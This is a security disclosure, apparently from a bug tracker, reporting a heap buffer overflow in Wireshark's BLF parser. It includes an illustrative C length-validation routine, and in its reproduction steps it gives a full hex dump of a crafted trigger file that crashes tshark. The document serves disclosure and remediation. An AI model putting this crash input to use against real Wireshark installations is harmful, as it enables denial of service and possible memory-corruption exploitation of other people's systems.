Heap buffer overflow vulnerability in BLF reader
Description:
A heap-buffer overflow vulnerability has been discovered in Wireshark's Binary Logging Format (BLF) file processing. The vulnerability occurs in the blf_pull_logcontainer_into_memory() function in the wiretap/blf.c file. The vulnerability could be exploited by providing a maliciously crafted BLF file, which could lead to arbitrary code execution.
Tested on: Ubuntu 22.04.2 LTS
Details:
The overflow is triggered by a call to memcpy (displayed as __asan_memcpy in the ASAN output), copying 28 bytes into a memory region that is only 15 bytes large. This region was allocated in blf_pull_logcontainer_into_memory using calloc at wiretap/blf.c:499.
After the overflow, the program execution continues until it attempts to allocate memory with malloc in wmem_strdup_printf (as part of error handling), causing a crash with the message malloc(): corrupted top size.
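As an added illustration of the kind of length check a mismatch like this calls for (example code written for this note; it is neither Wireshark's blf.c code nor the reporter's), the C program below parses an LOBJ-like block and validates the declared object length against the number of bytes it is about to copy before it allocates or copies anything. The header layout and field names, the 12-byte fixed body (chosen so that header + body = 28, mirroring the 28-into-15 copy described above), and the well-formed second input are assumptions made for the example; the first input is the LOBJ block from the trigger dump in this report.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical, simplified BLF-like object header for this example only.
 * It is NOT Wireshark's real structure; the layout is an assumption read
 * off the hex dump in the report (little-endian, 16-byte header):
 *   0..3 signature "LOBJ", 4..5 header size, 6..7 header version,
 *   8..11 object length (total, including this header), 12..15 object type */
#define OBJ_HEADER_SIZE     16u
/* Fixed-size body copied right after the header. 16 + 12 = 28 is chosen to
 * mirror the numbers in the report; it is not the real container header size. */
#define OBJ_FIXED_BODY_SIZE 12u
#define OBJ_MIN_SIZE        (OBJ_HEADER_SIZE + OBJ_FIXED_BODY_SIZE)

typedef enum {
    PARSE_OK = 0,
    PARSE_BAD_MAGIC,   /* not an LOBJ block */
    PARSE_TRUNCATED,   /* fewer bytes on hand than the object claims */
    PARSE_BAD_LENGTH,  /* declared length too small for the bytes we copy */
    PARSE_OOM
} parse_status;

static uint32_t rd32le(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Validate an object before allocating or copying. The decisive check is
 * declared >= OBJ_MIN_SIZE: a buffer sized from the declared length must be
 * large enough for every byte the parser will memcpy into it. */
parse_status check_object(const uint8_t *data, size_t avail, uint32_t *declared_out)
{
    if (avail < OBJ_HEADER_SIZE)
        return PARSE_TRUNCATED;
    if (memcmp(data, "LOBJ", 4) != 0)
        return PARSE_BAD_MAGIC;

    uint32_t declared = rd32le(data + 8);
    if (declared_out)
        *declared_out = declared;

    if (declared < OBJ_MIN_SIZE)
        return PARSE_BAD_LENGTH;   /* copying would overflow the allocation */
    if (declared > avail)
        return PARSE_TRUNCATED;    /* copying would read past the input */
    return PARSE_OK;
}

/* Allocate a buffer of the declared length and copy header + fixed body into
 * it, only after check_object accepted the object. Caller frees the result. */
uint8_t *load_object(const uint8_t *data, size_t avail, uint32_t *len_out, parse_status *st)
{
    uint32_t declared = 0;
    *st = check_object(data, avail, &declared);
    if (*st != PARSE_OK)
        return NULL;

    uint8_t *buf = calloc(declared, 1);
    if (buf == NULL) {
        *st = PARSE_OOM;
        return NULL;
    }
    memcpy(buf, data, OBJ_MIN_SIZE);  /* safe: declared >= OBJ_MIN_SIZE */
    if (len_out)
        *len_out = declared;
    return buf;
}

/* Constructed input 1: the LOBJ block from the report's trigger file
 * (bytes from offset 0x30 onward), which declares a 15-byte object. */
static const uint8_t trigger_obj[] = {
    0x4c,0x4f,0x42,0x4a, 0x10,0x00, 0x01,0x00, 0x0f,0x00,0x00,0x00, 0x0a,0x00,0x00,0x00,
    0x02,0x00, 0x30,0x30,0x30,0x30,0x30,0x30,0x30,0x30,0x30,0x30,0x30,0x30,0x30,0x30,
    0x30,0x30,0x30,0x30,0x30,0x30,0x30,0x30,0x30,0x30,0x30,0x30,0x30,0x30,0x30,0x30,
    0x30,0x30,0x30,0x30,0x30,0x30,0x30,0x30,0x30,0x30,0x30,0x30,
};

/* Constructed input 2 (made up for this example): same header, but a
 * consistent declared length of 48 bytes with 48 bytes actually present. */
static const uint8_t good_obj[48] = {
    0x4c,0x4f,0x42,0x4a, 0x10,0x00, 0x01,0x00, 0x30,0x00,0x00,0x00, 0x0a,0x00,0x00,0x00,
    /* remaining 32 bytes are zero-filled by the initializer */
};

int main(void)
{
    parse_status st;
    uint32_t len = 0;
    uint8_t *obj = load_object(trigger_obj, sizeof trigger_obj, &len, &st);
    printf("trigger block: status %d (PARSE_BAD_LENGTH is %d)\n", st, PARSE_BAD_LENGTH);
    free(obj);
    obj = load_object(good_obj, sizeof good_obj, &len, &st);
    printf("well-formed block: status %d, length %u\n", st, len);
    free(obj);
    return 0;
}
```

The point of the ordering is that the declared length is compared against both the fixed copy size and the bytes actually available before calloc is called, so an allocation sized from an attacker-controlled field can never be smaller than the copy that follows.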
Steps to reproduce:
$ xxd -g1 trigger
00000000: 4c 4f 47 47 30 00 00 00 30 30 30 30 30 30 30 30 LOGG0...00000000
00000010: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000
00000020: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000
00000030: 4c 4f 42 4a 10 00 01 00 0f 00 00 00 0a 00 00 00 LOBJ............
00000040: 02 00 30 30 30 30 30 30 30 30 30 30 30 30 30 30 ..00000000000000
00000050: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000
00000060: 30 30 30 30 30 30 30 30 30 30 30 30 000000000000
$ tshark -r trigger
malloc(): corrupted top size
Aborted
For a more detailed understanding of this vulnerability, I've attached the following files:
- Trigger File: This is the crafted BLF file that provokes the heap buffer overflow when processed by Wireshark.
- ASAN Output: AddressSanitizer's (ASAN) report provides additional insight into the memory corruption.
- GDB Backtrace of Tshark: This backtrace reveals the call sequence leading up to the crash in Wireshark's Tshark utility.
- GDB Backtrace of the Fuzzer
I'd also like to request a CVE ID for this vulnerability.
Please let me know if you need any additional information or assistance in addressing this vulnerability.
Regards,
Huáscar
Attachments: trigger, ASAN.txt, GDB_Backtrace_tshark.txt, GDB_Backtrace_fuzzer.txt